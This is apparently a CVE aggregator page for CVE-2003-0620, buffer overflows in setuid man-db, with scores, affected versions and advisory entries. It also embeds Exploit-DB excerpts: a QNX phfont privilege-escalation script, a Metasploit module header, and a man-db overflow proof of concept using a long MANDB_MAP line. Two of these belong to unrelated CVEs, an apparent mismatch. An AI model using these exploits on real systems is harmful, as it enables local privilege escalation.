CVE-2003-0620
published 2003-08-27CVE-2003-0620: Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and…
PriorityP414medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.80%
52.1th percentile
Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP arguments to add_to_dirlist in manp.c, (2) a long pathname to ult_src in ult_src.c, (3) a long .so argument to test_for_include in ult_src.c, (4) a long MANPATH environment variable, or (5) a long PATH environment variable.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| andries_brouwer | man | — | — |
| debian | man-db | < man-db 2.4.1-13 (bookworm) | man-db 2.4.1-13 (bookworm) |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
| man-db_project | man-db | >= 0 < 2.4.1-13 | 2.4.1-13 |
CVSS provenance
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
osv4.6MEDIUM
vendor_debian4.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-57q8-53w4-9h6q: Multiple buffer overflows in man-db 2
ghsa_unreviewed·2022-04-29
CVE-2003-0620 [MEDIUM] GHSA-57q8-53w4-9h6q: Multiple buffer overflows in man-db 2
Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP arguments to add_to_dirlist in manp.c, (2) a long pathname to ult_src in ult_src.c, (3) a long .so argument to test_for_include in ult_src.c, (4) a long MANPATH environment variable, or (5) a long PATH environment variable.
OSV
CVE-2003-0620: Multiple buffer overflows in man-db 2
osv·2003-08-27·CVSS 4.6
CVE-2003-0620 [MEDIUM] CVE-2003-0620: Multiple buffer overflows in man-db 2
Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP arguments to add_to_dirlist in manp.c, (2) a long pathname to ult_src in ult_src.c, (3) a long .so argument to test_for_include in ult_src.c, (4) a long MANPATH environment variable, or (5) a long PATH environment variable.
Debian
CVE-2003-0620: man-db - Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, al...
vendor_debian·2003·CVSS 4.6
CVE-2003-0620 [MEDIUM] CVE-2003-0620: man-db - Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, al...
Multiple buffer overflows in man-db 2.4.1 and earlier, when installed setuid, allow local users to gain privileges via (1) MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP arguments to add_to_dirlist in manp.c, (2) a long pathname to ult_src in ult_src.c, (3) a long .so argument to test_for_include in ult_src.c, (4) a long MANPATH environment variable, or (5) a long PATH environment variable.
Scope: local
bookworm: resolved (fixed in 2.4.1-13)
bullseye: resolved (fixed in 2.4.1-13)
forky: resolved (fixed in 2.4.1-13)
sid: resolved (fixed in 2.4.1-13)
trixie: resolved (fixed in 2.4.1-13)
No detection rules found.
Exploit-DB
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
exploitdb·2011-04-27
CVE-2010-0620 EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
---
##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EMC HomeBase Server Directory Traversal Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal and remote code execution
flaw in EMC HomeBase Server 6.3.0.
Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12458
Exploit-DB
QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
exploitdb·2006-02-08
CVE-2006-0620 QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
QNX Neutrino 6.2.1 - 'phfont' Race Condition Privilege Escalation
---
#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723 30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86
cat > phfontphf.c /tmp/dsr && /usr/sbin/inetd /tmp/dsr");
}
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*
# milw0rm.com [2006-02-08]
Exploit-DB
ManDB Utility 2.3/2.4 - Local Buffer Overflow
exploitdb·2003-07-29
CVE-2003-0620 ManDB Utility 2.3/2.4 - Local Buffer Overflow
ManDB Utility 2.3/2.4 - Local Buffer Overflow
---
source: https://www.securityfocus.com/bid/8303/info
The mandb utility has been reported to be affected by multiple local buffer overflow vulnerabilities.
These issues present themselves due to insufficient bounds checking performed on user-supplied data before it is copied into reserved buffers in memory. It has been reported that a local attacker may exploit these issues to execute arbitrary instructions in the context of the mandb utility.
# cd /tmp
# mkdir x
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# mandb
Segmentation fault
(can also apply this to the "man" binary, by fooling it with links)
# cd /tmp
# mkdir x
# ln /usr/bin/man mandb
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# ./mandb
Segmentation fa
No writeups or analysis indexed.
2003-08-27
Published